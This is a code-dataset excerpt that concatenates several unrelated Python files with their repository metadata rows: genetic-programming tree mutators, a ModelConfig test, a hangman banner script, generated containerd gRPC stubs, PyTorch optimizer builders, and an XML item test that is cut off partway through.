                        genome.setItem(i, j, 0)
                    mutations += 1
    else:
        # High expected count: toggle round(mutations) random cells.
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            # BUG FIX: the original read genome[i][j] here, using stale
            # (or undefined) loop indices instead of the freshly drawn
            # cell, so the wrong value was inspected before toggling.
            if genome[which_y][which_x] == 0:
                genome.setItem(which_y, which_x, 1)
            else:
                genome.setItem(which_y, which_x, 0)
    return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorSwap(genome, **args):
    """Swap mutator for GTree: exchanges data between random node pairs.

    .. versionadded:: 0.6
       The *GTreeMutatorSwap* function
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    expected = pmut * len(genome)
    if expected < 1.0:
        # Low expected count: flip a biased coin once per node.
        count = 0
        for _ in xrange(len(genome)):
            if utils.randomFlipCoin(pmut):
                count += 1
                first = genome.getRandomNode()
                second = genome.getRandomNode()
                first.swapNodeData(second)
        return count
    # High expected count: perform round(expected) random swaps.
    for _ in xrange(int(round(expected))):
        first = genome.getRandomNode()
        second = genome.getRandomNode()
        first.swapNodeData(second)
    return int(expected)
# -----------------------------------------------------------------
def GTreeMutatorIntegerRange(genome, **args):
    """ The mutator of GTree, Integer Range Mutator

    Accepts the *rangemin* and *rangemax* genome parameters, both optional.
    Mutated nodes get a uniform random integer in [rangemin, rangemax].

    .. versionadded:: 0.6
       The *GTreeMutatorIntegerRange* function

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    elements = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    range_min = genome.getParam("rangemin", constants.CDefRangeMin)
    range_max = genome.getParam("rangemax", constants.CDefRangeMax)
    if mutations < 1.0:
        # Low expected count: flip a biased coin once per node.
        mutations = 0
        for i in xrange(len(genome)):
            if utils.randomFlipCoin(args["pmut"]):
                mutations += 1
                rand_node = genome.getRandomNode()
                # +1 makes the upper bound inclusive.
                random_int = prng.randint(range_min, range_max + 1)
                rand_node.setData(random_int)
    else:
        # High expected count: redraw round(mutations) random nodes.
        for it in xrange(int(round(mutations))):
            rand_node = genome.getRandomNode()
            random_int = prng.randint(range_min, range_max + 1)  # inclusive upper bound
            rand_node.setData(random_int)
    return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorRealRange(genome, **args):
    """Real range mutator for GTree.

    Accepts the *rangemin* and *rangemax* genome parameters, both
    optional; mutated nodes get a uniform random real value within that
    range.

    .. versionadded:: 0.6
       The *GTreeMutatorRealRange* function
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    expected = pmut * len(genome)
    lo = genome.getParam("rangemin", constants.CDefRangeMin)
    hi = genome.getParam("rangemax", constants.CDefRangeMax)
    if expected < 1.0:
        # Low expected count: flip a biased coin once per node.
        count = 0
        for _ in xrange(len(genome)):
            if utils.randomFlipCoin(pmut):
                count += 1
                target = genome.getRandomNode()
                target.setData(prng.uniform(lo, hi))
        return count
    # High expected count: redraw round(expected) random nodes.
    for _ in xrange(int(round(expected))):
        target = genome.getRandomNode()
        target.setData(prng.uniform(lo, hi))
    return int(expected)
# -----------------------------------------------------------------
def GTreeMutatorIntegerGaussian(genome, **args):
    """ A gaussian mutator for GTree of Integers

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
    accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
    represents the mean and the std. dev. of the random distribution.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    elements = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = genome.getParam("gauss_mu", constants.CDefG1DListMutIntMU)
    sigma = genome.getParam("gauss_sigma", constants.CDefG1DListMutIntSIGMA)
    if mutations < 1.0:
        # Low expected count: flip a biased coin once per node.
        mutations = 0
        for i in xrange(len(genome)):
            if utils.randomFlipCoin(args["pmut"]):
                mutations += 1
                rand_node = genome.getRandomNode()
                # Integer-truncated gaussian offset, clamped into
                # [rangemin, rangemax].
                final_value = rand_node.getData() + int(prng.normal(mu, sigma))
                final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                rand_node.setData(final_value)
    else:
        # High expected count: perturb round(mutations) random nodes.
        for it in xrange(int(round(mutations))):
            rand_node = genome.getRandomNode()
            final_value = rand_node.getData() + int(prng.normal(mu, sigma))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            rand_node.setData(final_value)
    return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorRealGaussian(genome, **args):
    """ A gaussian mutator for GTree of Real numbers

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
    accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
    represents the mean and the std. dev. of the random distribution.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    elements = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = genome.getParam("gauss_mu", constants.CDefG1DListMutRealMU)
    sigma = genome.getParam("gauss_sigma", constants.CDefG1DListMutRealSIGMA)
    if mutations < 1.0:
        # Low expected count: flip a biased coin once per node.
        mutations = 0
        for i in xrange(len(genome)):
            if utils.randomFlipCoin(args["pmut"]):
                mutations += 1
                rand_node = genome.getRandomNode()
                # Additive gaussian offset, clamped into [rangemin, rangemax].
                final_value = rand_node.getData() + prng.normal(mu, sigma)
                final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                rand_node.setData(final_value)
    else:
        # High expected count: perturb round(mutations) random nodes.
        for it in xrange(int(round(mutations))):
            rand_node = genome.getRandomNode()
            final_value = rand_node.getData() + prng.normal(mu, sigma)
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            rand_node.setData(final_value)
    return int(mutations)
# -----------------------------------------------------------------
def _gtreegp_pick_replacement(rand_node, gp_terminals, gp_function_set):
    """Return a same-arity replacement symbol for *rand_node*, or None.

    Terminal nodes get a random terminal; function nodes get a random
    function with the same arity as the node's current operator. Returns
    None when no function candidate with that arity exists.
    """
    if rand_node.getType() == constants.nodeType["TERMINAL"]:
        return prng.choice(gp_terminals)
    op_len = gp_function_set[rand_node.getData()]
    fun_candidates = [op for op, arity in gp_function_set.items() if arity == op_len]
    if len(fun_candidates) <= 0:
        return None
    return prng.choice(fun_candidates)


def GTreeGPMutatorOperation(genome, **args):
    """ The mutator of GTreeGP, Operation Mutator

    Replaces the symbol stored in random nodes with another symbol of
    the same arity (terminals are replaced by terminals). Requires the
    engine params *gp_terminals* and *gp_function_set*.

    .. versionadded:: 0.6
       The *GTreeGPMutatorOperation* function

    :return: number of mutation attempts performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    elements = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    ga_engine = args["ga_engine"]
    gp_terminals = ga_engine.getParam("gp_terminals")
    assert gp_terminals is not None
    gp_function_set = ga_engine.getParam("gp_function_set")
    assert gp_function_set is not None
    if mutations < 1.0:
        # Low expected count: flip a biased coin once per node.
        mutations = 0
        for i in xrange(len(genome)):
            if utils.randomFlipCoin(args["pmut"]):
                # Counted before the candidate check, so attempts with no
                # same-arity alternative still contribute to the total
                # (matches the historical behaviour).
                mutations += 1
                rand_node = genome.getRandomNode()
                assert rand_node is not None
                replacement = _gtreegp_pick_replacement(rand_node, gp_terminals, gp_function_set)
                if replacement is None:
                    continue
                rand_node.setData(replacement)
    else:
        # High expected count: attempt round(mutations) random replacements.
        for it in xrange(int(round(mutations))):
            rand_node = genome.getRandomNode()
            assert rand_node is not None
            replacement = _gtreegp_pick_replacement(rand_node, gp_terminals, gp_function_set)
            if replacement is None:
                continue
            rand_node.setData(replacement)
    return int(mutations)
# -----------------------------------------------------------------
def GTreeGPMutatorSubtree(genome, **args):
    """ The mutator of GTreeGP, Subtree Mutator

    This mutator will recreate random subtree of the tree using the grow algorithm.
    Requires the *max_depth* genome parameter.

    .. versionadded:: 0.6
       The *GTreeGPMutatorSubtree* function

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    ga_engine = args["ga_engine"]
    max_depth = genome.getParam("max_depth", None)
    mutations = 0
    if max_depth is None:
        utils.raiseException("You must specify the max_depth genome parameter !", ValueError)
    if max_depth < 0:
        # NOTE(review): the message says max_depth must be >= 1 but this
        # check only rejects negative values (0 passes) -- confirm which
        # bound is actually intended.
        utils.raiseException("The max_depth must be >= 1, if you want to use GTreeGPMutatorSubtree crossover !", ValueError)
    branch_list = genome.nodes_branch
    elements = len(branch_list)
    for i in xrange(elements):
        node = branch_list[i]
        assert node is not None
        if utils.randomFlipCoin(args["pmut"]):
            depth = genome.getNodeDepth(node)
            mutations += 1
            # Grow a fresh subtree limited so the tree cannot exceed max_depth.
            root_subtree = tree.buildGTreeGPGrow(ga_engine, 0, max_depth - depth)
            node_parent = node.getParent()
            if node_parent is None:
                # The root itself was mutated: replace the whole tree and
                # return immediately (at most one mutation in this case).
                genome.setRoot(root_subtree)
                genome.processNodes()
                return mutations
            else:
                root_subtree.setParent(node_parent)
                node_parent.replaceChild(node, root_subtree)
            genome.processNodes()
    return int(mutations)
# -----------------------------------------------------------------
| 32.927663 | 129 | 0.60155 | 4,683 | 41,423 | 5.237241 | 0.072176 | 0.058713 | 0.039142 | 0.043056 | 0.827122 | 0.808897 | 0.780152 | 0.767838 | 0.74949 | 0.73575 | 0 | 0.014563 | 0.239118 | 41,423 | 1,257 | 130 | 32.953858 | 0.763564 | 0.210221 | 0 | 0.808 | 0 | 0 | 0.048179 | 0.002618 | 0 | 0 | 0 | 0 | 0.009333 | 1 | 0.041333 | false | 0 | 0.005333 | 0 | 0.132 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5974017c156e95d28bac08b780a8c810da195bc2 | 1,330 | py | Python | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 5 | 2019-10-19T13:00:34.000Z | 2022-01-16T17:31:42.000Z | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 162 | 2019-08-22T10:28:46.000Z | 2022-03-28T17:33:16.000Z | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | null | null | null | from sciencebeam_trainer_delft.sequence_labelling.config import ModelConfig
# Arbitrary fixture values shared by the TestModelConfig cases below.
FEATURE_INDICES_1 = [9, 10, 11]
FEATURES_EMBEDDING_SIZE_1 = 13
class TestModelConfig:
    """Verify that ModelConfig accepts both the singular and plural spellings
    of the feature-related keyword arguments and exposes both attribute
    aliases with the same value."""

    def test_should_be_able_to_pass_in_feature_indices(self):
        """Singular keyword populates both index aliases."""
        config = ModelConfig(feature_indices=FEATURE_INDICES_1)
        assert config.feature_indices == FEATURE_INDICES_1
        assert config.features_indices == FEATURE_INDICES_1

    def test_should_be_able_to_pass_in_features_indices(self):
        """Plural keyword populates both index aliases."""
        config = ModelConfig(features_indices=FEATURE_INDICES_1)
        assert config.feature_indices == FEATURE_INDICES_1
        assert config.features_indices == FEATURE_INDICES_1

    def test_should_be_able_to_pass_in_feature_embedding_size(self):
        """Singular keyword populates both embedding-size aliases."""
        config = ModelConfig(feature_embedding_size=FEATURES_EMBEDDING_SIZE_1)
        assert config.feature_embedding_size == FEATURES_EMBEDDING_SIZE_1
        assert config.features_embedding_size == FEATURES_EMBEDDING_SIZE_1

    def test_should_be_able_to_pass_in_features_embedding_size(self):
        """Plural keyword populates both embedding-size aliases."""
        config = ModelConfig(features_embedding_size=FEATURES_EMBEDDING_SIZE_1)
        assert config.feature_embedding_size == FEATURES_EMBEDDING_SIZE_1
        assert config.features_embedding_size == FEATURES_EMBEDDING_SIZE_1
| 45.862069 | 85 | 0.814286 | 176 | 1,330 | 5.573864 | 0.181818 | 0.198777 | 0.235474 | 0.146789 | 0.866463 | 0.79103 | 0.711519 | 0.703364 | 0.696228 | 0.654434 | 0 | 0.018357 | 0.13985 | 1,330 | 28 | 86 | 47.5 | 0.839161 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | false | 0.2 | 0.05 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
59751099bf10bf46cf21577189d2b4009e42f7f9 | 514 | py | Python | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | import random
print("""
_ _
| | | |
| |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __
| __ |/ _` | '_ \ / _` | '_ ` _ \ / _` | '_ \
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
__/ |
|___/
""")
random.seed(a=None, version=2)
print(random.randint(5, 10))
""" ASCII ART LOGO FOR THE HANGMAN GAME """
| 28.555556 | 49 | 0.289883 | 21 | 514 | 4.285714 | 0.857143 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01581 | 0.507782 | 514 | 17 | 50 | 30.235294 | 0.339921 | 0 | 0 | 0 | 0 | 0.230769 | 0.804671 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0.153846 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
599bf6f0e012a31eebfb7a79a0d3a2134dcfd5d0 | 6,631 | py | Python | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from containerd.services.namespaces.v1 import namespace_pb2 as containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2
from containerd.vendor.google.protobuf import empty_pb2 as containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2
class NamespacesStub(object):
  """Namespaces provides the ability to manipulate containerd namespaces.

  All objects in the system are required to be a member of a namespace. If a
  namespace is deleted, all objects, including containers, images and
  snapshots, will be deleted, as well.

  Unless otherwise noted, operations in containerd apply only to the namespace
  supplied per request.

  I hope this goes without saying, but namespaces are themselves NOT
  namespaced.
  """

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    # Auto-generated client stub: one callable per unary-unary RPC of the
    # containerd Namespaces service, each pairing the fully-qualified method
    # name with its protobuf request serializer / response deserializer.
    self.Get = channel.unary_unary(
        '/containerd.services.namespaces.v1.Namespaces/Get',
        request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceRequest.SerializeToString,
        response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceResponse.FromString,
        )
    self.List = channel.unary_unary(
        '/containerd.services.namespaces.v1.Namespaces/List',
        request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesRequest.SerializeToString,
        response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesResponse.FromString,
        )
    self.Create = channel.unary_unary(
        '/containerd.services.namespaces.v1.Namespaces/Create',
        request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceRequest.SerializeToString,
        response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceResponse.FromString,
        )
    self.Update = channel.unary_unary(
        '/containerd.services.namespaces.v1.Namespaces/Update',
        request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceRequest.SerializeToString,
        response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceResponse.FromString,
        )
    self.Delete = channel.unary_unary(
        '/containerd.services.namespaces.v1.Namespaces/Delete',
        request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.DeleteNamespaceRequest.SerializeToString,
        # Delete returns google.protobuf.Empty rather than a namespace message.
        response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
class NamespacesServicer(object):
  """Namespaces provides the ability to manipulate containerd namespaces.

  All objects in the system are required to be a member of a namespace. If a
  namespace is deleted, all objects, including containers, images and
  snapshots, will be deleted, as well.

  Unless otherwise noted, operations in containerd apply only to the namespace
  supplied per request.

  I hope this goes without saying, but namespaces are themselves NOT
  namespaced.
  """

  # Auto-generated server-side base class: every method is a placeholder
  # that rejects the call with UNIMPLEMENTED until a subclass overrides it.

  def Get(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def List(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Create(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Update(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Delete(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
def add_NamespacesServicer_to_server(servicer, server):
  """Register *servicer*'s RPC handlers on *server* under the
  'containerd.services.namespaces.v1.Namespaces' service name.

  Generated helper: maps each RPC method name to a unary-unary handler that
  deserializes the request and serializes the response with the protobuf
  classes from namespace_pb2.
  """
  rpc_method_handlers = {
      'Get': grpc.unary_unary_rpc_method_handler(
          servicer.Get,
          request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceRequest.FromString,
          response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceResponse.SerializeToString,
      ),
      'List': grpc.unary_unary_rpc_method_handler(
          servicer.List,
          request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesRequest.FromString,
          response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesResponse.SerializeToString,
      ),
      'Create': grpc.unary_unary_rpc_method_handler(
          servicer.Create,
          request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceRequest.FromString,
          response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceResponse.SerializeToString,
      ),
      'Update': grpc.unary_unary_rpc_method_handler(
          servicer.Update,
          request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceRequest.FromString,
          response_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceResponse.SerializeToString,
      ),
      'Delete': grpc.unary_unary_rpc_method_handler(
          servicer.Delete,
          request_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.DeleteNamespaceRequest.FromString,
          # Delete responds with google.protobuf.Empty.
          response_serializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'containerd.services.namespaces.v1.Namespaces', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
| 48.757353 | 137 | 0.797316 | 759 | 6,631 | 6.575758 | 0.15942 | 0.057303 | 0.079944 | 0.091364 | 0.858946 | 0.837908 | 0.837908 | 0.79984 | 0.742737 | 0.742737 | 0 | 0.008792 | 0.142362 | 6,631 | 135 | 138 | 49.118519 | 0.868824 | 0.189263 | 0 | 0.287356 | 1 | 0 | 0.104371 | 0.05633 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08046 | false | 0.057471 | 0.034483 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
59ce35548e2efa26b53c7532f6215c77043aa282 | 4,464 | py | Python | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | solver/build.py | huangzongheng/NAMA | e9bc5b9ca0c1dd5fff2f0613fdaac9fc5b038152 | [
"MIT"
] | null | null | null | # encoding: utf-8
"""
@author: sherlock
@contact: sherlockliao01@gmail.com
"""
import torch
from .ranger import Ranger
def make_optimizer(cfg, model):
    """Build the optimizer described by ``cfg.SOLVER`` for ``model``.

    Depending on ``cfg.SOLVER.TRAIN_MODE``, part of the network is frozen
    first ('base' freezes the affine parameters, 'affine' freezes everything
    else; 'all' or any other value freezes nothing).  Each trainable
    parameter then gets its own group with an lr / weight-decay picked from
    substring matches on the parameter name.

    Returns:
        A ``torch.optim`` optimizer named by ``cfg.SOLVER.OPTIMIZER_NAME``
        (momentum is forwarded only for 'SGD').
    """
    solver = cfg.SOLVER
    mode = solver.TRAIN_MODE

    # Optionally freeze a subset of the network before collecting parameters.
    if mode in ('base', 'affine'):
        for name, param in model.named_parameters():
            is_affine = 'affine' in name
            if (mode == 'base') == is_affine:
                param.requires_grad_(False)

    param_groups = []
    for name, param in model.named_parameters():
        if not param.requires_grad:
            continue
        lr = solver.BASE_LR
        decay = solver.WEIGHT_DECAY
        # Later matches deliberately override earlier ones.
        if "bias" in name:
            lr = solver.BASE_LR * solver.BIAS_LR_FACTOR
            decay = solver.WEIGHT_DECAY_BIAS
        if "uc_k" in name:
            decay = solver.WEIGHT_DECAY_POLY
        if "neck" in name or "classifier" in name:
            decay = solver.WEIGHT_DECAY_NECK
        if "bn_f" in name:
            decay = 0  # cfg.SOLVER.WEIGHT_DECAY_NECK
        param_groups.append({"params": [param], "lr": lr, "weight_decay": decay})

    optimizer_cls = getattr(torch.optim, solver.OPTIMIZER_NAME)
    if solver.OPTIMIZER_NAME == 'SGD':
        return optimizer_cls(param_groups, momentum=solver.MOMENTUM)
    return optimizer_cls(param_groups)
def make_optimizer_with_center(cfg, model, center_criterion):
    """Build the model optimizer plus a separate SGD optimizer for the
    center-loss criterion.

    Bias parameters get ``BASE_LR * BIAS_LR_FACTOR`` and
    ``WEIGHT_DECAY_BIAS``; everything else gets the base lr / decay.

    Returns:
        ``(optimizer, optimizer_center)`` — the main optimizer named by
        ``cfg.SOLVER.OPTIMIZER_NAME`` and an SGD over the center criterion's
        parameters at ``cfg.SOLVER.CENTER_LR``.
    """
    solver = cfg.SOLVER
    param_groups = []
    for name, param in model.named_parameters():
        if not param.requires_grad:
            continue
        if "bias" in name:
            group = {"params": [param],
                     "lr": solver.BASE_LR * solver.BIAS_LR_FACTOR,
                     "weight_decay": solver.WEIGHT_DECAY_BIAS}
        else:
            group = {"params": [param],
                     "lr": solver.BASE_LR,
                     "weight_decay": solver.WEIGHT_DECAY}
        param_groups.append(group)

    optimizer_cls = getattr(torch.optim, solver.OPTIMIZER_NAME)
    if solver.OPTIMIZER_NAME == 'SGD':
        optimizer = optimizer_cls(param_groups, momentum=solver.MOMENTUM)
    else:
        optimizer = optimizer_cls(param_groups)
    optimizer_center = torch.optim.SGD(center_criterion.parameters(), lr=solver.CENTER_LR)
    return optimizer, optimizer_center
def make_optimizer_region(cfg, model):
    """Build the optimizer for region/head training.

    When ``cfg.SOLVER.TRAIN_MODE == 'head'`` every parameter whose name does
    not contain 'head' is frozen first; any other mode leaves the network
    untouched.  Per-parameter groups are then built with bias parameters at
    ``BASE_LR * BIAS_LR_FACTOR`` and head parameters at
    ``BASE_LR * HEAD_LR_FACTOR``.

    Returns:
        A ``torch.optim`` optimizer named by ``cfg.SOLVER.OPTIMIZER_NAME``
        (momentum is forwarded only for 'SGD').
    """
    solver = cfg.SOLVER

    # Freeze the backbone when only the head should be trained.
    if solver.TRAIN_MODE == 'head':
        for name, param in model.named_parameters():
            if 'head' not in name:
                param.requires_grad_(False)

    param_groups = []
    # NOTE(review): unlike make_optimizer, frozen parameters are NOT skipped
    # here — the original implementation deliberately left that check disabled.
    for name, param in model.named_parameters():
        lr = solver.BASE_LR
        decay = solver.WEIGHT_DECAY
        if "bias" in name:
            lr = solver.BASE_LR * solver.BIAS_LR_FACTOR
            decay = solver.WEIGHT_DECAY_BIAS
        elif "head" in name:
            lr = solver.BASE_LR * solver.HEAD_LR_FACTOR
            decay = solver.WEIGHT_DECAY_BIAS
        param_groups.append({"params": [param], "lr": lr, "weight_decay": decay})

    optimizer_cls = getattr(torch.optim, solver.OPTIMIZER_NAME)
    if solver.OPTIMIZER_NAME == 'SGD':
        return optimizer_cls(param_groups, momentum=solver.MOMENTUM)
    return optimizer_cls(param_groups)
def freeze_specified_layers(model, layers):
    """Disable gradients for every parameter of *model* whose name contains
    any of the substrings in *layers*."""
    for name, param in model.named_parameters():
        if any(token in name for token in layers):
            param.requires_grad_(False)
| 38.482759 | 105 | 0.614247 | 560 | 4,464 | 4.692857 | 0.135714 | 0.15411 | 0.0586 | 0.091324 | 0.825342 | 0.814688 | 0.814688 | 0.802131 | 0.748097 | 0.730213 | 0 | 0.002818 | 0.284498 | 4,464 | 115 | 106 | 38.817391 | 0.819975 | 0.158378 | 0 | 0.707317 | 0 | 0 | 0.038379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.02439 | 0 | 0.109756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abd2c4645fb38a8fc9c4c76cce988c2c36ad295c | 2,317 | py | Python | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | tests/items/genericitem_test.py | psiopic2/psicrawler | bb6078446c6f5b7e7a7b80264bdbcbbebc5265db | [
"MIT"
] | null | null | null | from psicrawler.items import GenericItem
from psicrawler.items import from_xml
def test_xml_generation_with_topics():
    """asXml() should serialise title, url, source, text and every topic."""
    expected_xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
<topic>Topic 1</topic>
<topic>Topic 2</topic>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
    item = GenericItem()
    item['title'] = 'Foobar'
    item['url'] = 'http://foobar'
    item['source'] = 'foobar'
    item['topics'] = ('Topic 1', 'Topic 2')
    item['text'] = 'wharblegarble'
    assert item.asXml() == expected_xml
def test_xml_generation_without_topics():
    """asXml() should emit an empty <topics> element when no topics are set."""
    expected_xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
</topics>
<source>foobar</source>
